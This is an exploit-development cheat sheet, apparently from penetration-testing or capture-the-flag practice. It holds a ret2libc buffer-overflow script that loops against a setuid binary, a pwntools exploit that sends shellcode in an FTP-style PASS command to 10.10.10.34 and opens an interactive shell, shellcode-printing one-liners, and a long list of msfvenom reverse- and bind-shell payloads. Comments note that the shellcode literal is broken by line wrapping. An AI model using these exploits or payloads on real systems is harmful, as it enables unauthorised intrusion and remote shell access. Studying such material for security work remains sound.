Cheatsheet

Exploit Development

Hexdump (Python string format)

hexdump -v -e '"\\""x" 1/1 "%02x" ""' example.exe
printf $(cat file.txt | tr -d '\n')

Cross-compile with mingw32

i586-mingw32msvc-gcc a.c
wine a.exe

Passing binary data as arguments

command $(python -c 'print ...')

Passing binary data as standard input

python -c 'print ...' | command

Use a file as input, then read from standard input

cat file - | command
python -c 'print ...' | cat file - | command    

Printing shellcode

(Bash) echo -e '\x31\xc0\x50\x68\x2f...'
(Python) python -c 'print "\x31\xc0\x50\x68\x2f..."'
(Perl) perl -e 'print "\x31\xc0\x50\x68\x2f..."'

ret2libc

  • Find libc base address: ldd /usr/local/bin/backup
  • Find libc system function: readelf -s /lib32/libc.so.6 | grep system
  • Find libc exit function: readelf -s /lib32/libc.so.6 | grep exit
  • Find libc /bin/sh reference: strings -a -t x /lib32/libc.so.6 | grep /bin/sh
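import struct
import subprocess

# The values below were read from the target with ldd / readelf / strings
# (see the bullets above).  They belong to that specific libc build and load
# address and must be recomputed for any other environment.
libc = 0xf75e2000            # libc base as reported by ldd on the target
sysOffset = 0x0003a940       # offset of system() inside libc
sysAddress = libc + sysOffset
exitOffset = 0x0002e7b0      # offset of exit() inside libc
exitAddress = libc + exitOffset
binsh = libc + 0x0015900b    # offset of the "/bin/sh" string inside libc

# Classic ret2libc frame for a 32-bit little-endian target ("<I" packs four
# bytes): padding up to the saved return address, then system(), the address
# system() "returns" to (exit()), and system()'s single argument.  The
# 512-byte padding is target-specific and is not derived on this page.
payload = "A" * 512
payload += struct.pack("<I", sysAddress)    # overwritten return address
payload += struct.pack("<I", exitAddress)   # where system() returns to
payload += struct.pack("<I", binsh)         # argument passed to system()

attempts = 0

# The script re-runs the target indefinitely, presumably because the guessed
# libc base is only correct on some executions (ASLR).  From a defender's
# side a miss typically crashes the target, so this shows up as a burst of
# crashes of the same binary in the kernel/crash logs.
# The original wrote `"Attempts: " + attempts`, which raises TypeError
# (str + int) before the first call; %-formatting is valid in Python 2 and 3.
while True:
    attempts += 1
    print("Attempts: %d" % attempts)
    subprocess.call(["/usr/local/bin/vulnerable-binary", "arg1", "arg2", payload])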

Network attack

from pwn import *  # pwntools: p32() and remote() below come from here

# NOTE(review): the literal below is split by line-wrapping in this copy (the
# assignment ends at "=" and escapes such as "\xc" / "d\x80" are cut in half),
# so it does not parse as written.  The bytes are sent verbatim as a raw x86
# payload; nothing on this page documents what they do.
shellcode =
"\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\x58\xc
d\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f\x2f\x7
3\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"

# 28 bytes of padding, a hard-coded 32-bit address (p32 packs four bytes) as
# the overwritten return address, then the payload.  A fixed address like this
# only stays valid on a target whose stack is not randomized -- presumably the
# case for the host below; it is not derived anywhere on this page.
payload = "A"*28 + p32(0xffffd630) + shellcode
r = remote('10.10.10.34', 7411)  # host and port exactly as given on the page
print r.recv(1024)  # banner (Python 2 print statement)

# USER/PASS exchange with the service; the overflow is carried in the PASS value.
r.sendline('USER admin')
print r.recv(1024)

r.sendline('PASS ' + payload)
r.interactive()  # hand the open connection over to the terminal

Simple SUID Binary

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

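/*
 * Demonstration of why a root-owned binary with the setuid bit that calls
 * system() is dangerous: once setuid(0) succeeds, the /bin/sh -c wrapper that
 * system() starts, and the "id" it runs, execute as root.
 *
 * Returns 0 on success and 1 if setuid(0) fails.  The original ignored the
 * return value, so when the file was not root-owned/setuid it silently ran
 * "id" as the invoking user, hiding the failure.
 */
int main(void)
{
  /* setuid(0) only succeeds when the process already holds root privileges
   * (typically because the file is root-owned with the setuid bit); report
   * the failure instead of continuing unprivileged. */
  if (setuid(0) != 0) {
    perror("setuid");
    return 1;
  }
  /* system() runs "id" through the shell with the inherited environment, so
   * PATH decides which "id" binary executes -- a classic weakness of setuid
   * code that calls system() with a relative command name. */
  system("id");
  return 0;
}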

msfvenom

Payloads

cmd/unix/bind_awk
cmd/unix/bind_busybox_telnetd
cmd/unix/bind_inetd
cmd/unix/bind_lua
cmd/unix/bind_netcat
cmd/unix/bind_netcat_gaping
cmd/unix/bind_netcat_gaping_ipv6
cmd/unix/bind_nodejs
cmd/unix/bind_perl
cmd/unix/bind_perl_ipv6
cmd/unix/bind_r
cmd/unix/bind_ruby
cmd/unix/bind_ruby_ipv6
cmd/unix/bind_socat_udp
cmd/unix/bind_stub
cmd/unix/bind_zsh
cmd/unix/generic
cmd/unix/reverse
cmd/unix/reverse_awk
cmd/unix/reverse_bash
cmd/unix/reverse_bash_telnet_ssl
cmd/unix/reverse_ksh
cmd/unix/reverse_lua
cmd/unix/reverse_ncat_ssl
cmd/unix/reverse_netcat
cmd/unix/reverse_netcat_gaping
cmd/unix/reverse_nodejs
cmd/unix/reverse_openssl
cmd/unix/reverse_perl
cmd/unix/reverse_perl_ssl
cmd/unix/reverse_php_ssl
cmd/unix/reverse_python
cmd/unix/reverse_python_ssl
cmd/unix/reverse_r
cmd/unix/reverse_ruby
cmd/unix/reverse_ruby_ssl
cmd/unix/reverse_socat_udp
cmd/unix/reverse_ssl_double_telnet
cmd/unix/reverse_stub
cmd/unix/reverse_zsh
cmd/windows/adduser
cmd/windows/generic
cmd/windows/powershell_bind_tcp
cmd/windows/powershell_reverse_tcp
cmd/windows/reverse_powershell
firefox/exec
firefox/shell_bind_tcp
firefox/shell_reverse_tcp
generic/shell_bind_tcp
generic/shell_reverse_tcp
java/shell/bind_tcp
java/shell/reverse_tcp
java/shell_reverse_tcp
linux/x64/exec
linux/x64/shell/bind_tcp
linux/x64/shell/reverse_tcp
linux/x64/shell_bind_tcp
linux/x64/shell_reverse_tcp
linux/x86/adduser
linux/x86/chmod
linux/x86/exec
linux/x86/shell/bind_tcp
linux/x86/shell/reverse_tcp
linux/x86/shell_bind_tcp
linux/x86/shell_reverse_tcp
multi/meterpreter/reverse_http
multi/meterpreter/reverse_https
nodejs/shell_bind_tcp
nodejs/shell_reverse_tcp
osx/armle/shell/bind_tcp
osx/armle/shell/reverse_tcp
osx/armle/shell_bind_tcp
osx/armle/shell_reverse_tcp
osx/ppc/shell/bind_tcp
osx/ppc/shell/reverse_tcp
osx/ppc/shell_bind_tcp
osx/ppc/shell_reverse_tcp
osx/x64/exec
osx/x64/shell_bind_tcp
osx/x64/shell_reverse_tcp
osx/x86/exec
osx/x86/shell_bind_tcp
osx/x86/shell_reverse_tcp
php/bind_php
php/download_exec
php/exec
php/reverse_perl
php/reverse_php
php/shell_findsock
python/shell_bind_tcp
python/shell_reverse_tcp
r/shell_bind_tcp
r/shell_reverse_tcp
ruby/shell_bind_tcp
ruby/shell_reverse_tcp
windows/adduser
windows/dllinject/bind_tcp
windows/dllinject/reverse_tcp
windows/download_exec
windows/exec
windows/powershell_bind_tcp
windows/powershell_reverse_tcp
windows/shell/bind_tcp
windows/shell/reverse_tcp
windows/shell_bind_tcp
windows/shell_reverse_tcp
windows/upexec/bind_tcp
windows/upexec/reverse_tcp
windows/x64/exec
windows/x64/powershell_bind_tcp
windows/x64/powershell_reverse_tcp
windows/x64/shell/bind_tcp
windows/x64/shell/reverse_tcp
windows/x64/shell_bind_tcp
windows/x64/shell_reverse_tcp